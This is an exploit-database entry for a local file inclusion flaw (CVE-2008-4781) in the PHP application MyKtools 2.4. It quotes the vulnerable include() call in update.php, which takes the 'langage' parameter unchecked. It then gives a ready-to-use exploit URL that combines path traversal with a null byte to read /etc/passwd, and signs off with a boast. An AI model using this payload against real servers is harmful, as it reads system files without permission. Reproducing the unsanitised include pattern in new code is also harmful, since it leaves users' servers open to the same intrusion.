MyKtools 2.4 - 'langage' Local File Inclusion



EKU-ID: 14724 CVE: OSVDB-49370;CVE-2008-4781 OSVDB-ID:
Author: x0r Published: 2008-10-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


##############
# Autor: x0r
#
# Email: evolutionteam.x0[at]gmail[dot]com
#
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip
#
# Bug: LFI
##############

Bug:

In \update.php

// Include du fichier langue
if ($_GET['langage'])
{
$langue = $_GET['langage'];
include ("lang/".$langue.".php");
}

Exploit: \update.php?langage=../../../../../../etc/passwd%00

p0wn3d Beby.

-=EOF=-

# milw0rm.com [2008-10-27]